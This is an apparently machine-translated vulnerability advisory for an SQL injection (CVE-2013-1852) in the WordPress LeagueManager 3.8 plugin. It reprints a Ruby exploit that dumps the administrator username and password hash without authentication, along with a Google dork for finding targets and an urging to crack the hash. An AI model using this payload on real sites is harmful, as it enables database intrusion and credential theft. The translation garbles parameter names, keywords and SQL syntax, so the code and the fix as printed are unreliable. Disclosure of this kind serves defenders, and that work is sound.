WordPress LeagueManager plug-in 'Rule _ id' parameter SQL Injection Vulnerability

Released on: 2013-03-13
Updated on: 2013-03-19

Affected Systems:
WordPress LeagueManager 3.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58503
CVE (CAN) ID: CVE-2013-1852
 
WordPress LeagueManager is a plug-in for managing and displaying Sports Leagues.
 
The LeagueManager 3.8 and other versions have the SQL injection vulnerability in the implementation of the 'rule _ id' parameter on the leaguemanager_export page. This vulnerability allows attackers to perform unauthorized database operations.
 
<* Source: Joshua Renault

Link: http://www.securelist.com/en/advisories/52641
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/ruby
#
# Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
# Google Dork: inurl: "/wp-content/plugins/leaguemanager /"
# Date: 13/03/13
# Exploit Author: Joshua Renault
# Vendorhomepage: http://wordpress.org/extend/plugins/leaguemanager/
# Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip
# Version: 3.8
# Tested on: BT5R1-Ubuntu 10.04.2 LTS
# CVE: CVE-2013-1852
# Renewal #-----------------------------------------------------------------------------------------
# Description:
#
# An SQL Injection vulnerability exists in the league_id parameter of a function call made
# By the leaguemanager_export page. This request is processed within the leaguemanager. php:
#
# If (isset ($ _ POST ['leaguemanager _ export'])
# $ LmLoader-> adminPanel-> export ($ _ POST ['situations _ id'], $ _ POST ['Mode']);
#
# Which does not sanitize of SQL injection, and is passed to the admin/admin. php page
# Into the export ($ league_id, $ mode) function which also does not sanitize for SQL injection
# When making this call: $ this-> league = $ leaguemanager-> getLeague ($ league_id );
# The information is then echoed to a CSV file that is then provided.
#
# Since no authentication is required when making a POST request to this page,
# I. e/wp-admin/admin. php? Page = leaguemanager-export the request can be made with no established
# Session.
#
# Fix:
#
# A possible fix for this wocould be to cast the league_id to an integer during any
# Of the function CILS. The following changes can be made in the leaguemanager. php file:
# $ LmLoader-> adminPanel-> export (int) $ _ POST ['rules _ id'], $ _ POST ['Mode']);
#
# These functions shoshould also not be available to public requests, and thus session handling
# Shoshould also be checked prior to the requests being processed within the admin section.
#
# The responsible disclosure processes were distorted by the fact that the author no longer
# Supports his well established plugin, and there are currently no maintainers. After
# E-mailing the folks over at plugins@wordpress.org they 've decided to discontinue the plugin
# And not patch the vulnerability.
#
# The following ruby exploit will retrieve the administrator username and the salted
# Password hash from a given site with the plugin installed:
# Renewal #------------------------------------------------------------------------------------------
# Exploit:

Require 'net/http'
Require 'uri'

If ARGV. length = 2
Post_params = {
'Terms _ id' => '7 union select all user_login, 2, 3, 4, 5, 6, 7, 8 ,'\
'9, 10, 11, 12, 13, user_pass, 15, 16, 17,18, 19,20, 22, from wp_users --',
'Mode' => 'temams ',
'Leaguemanager _ export' => 'Download + file'
}

Target_url = ARGV [0] + ARGV [1] + "/wp-admin/admin. php? Page = leaguemanager-export"

Begin
Resp = Net: HTTP. post_form (URI. parse (target_url), post_params)
Rescue
Puts "Invalid URL ..."
End

If resp. nil?
Print_error "No response received ed ..."

Elsif resp. code! = "200"
Puts "Page doesn' t exist! "
Else
Admin_login = resp. body. scan (/21 \ t (. *) \ t2. * 0 \ t (. *) \ t15 /)

If (admin_login.length> 0)
Puts "Username: # {admin_login [0] [0]}"
Puts "Hash: # {admin_login [0] [1]}"
Puts "\ nNow go crack that with Hashcat :)"
Else
Puts "Username and hash not supported ed. Maybe it's patched? "
End
End
Else
Puts "Usage: ruby LeagueManagerSQLI. rb \" http://example.com \ "\"/wordpress \""
End

# Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
#
# Contact:
# Mail: infosec4breakfast@gmail.com
# Blog: infosec4breakfast.com
# Twitter: @ jershmagersh
# Youtube: youtube.com/user/infosec4breakfast

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://wordpress.org/extend/plugins/leaguemanager/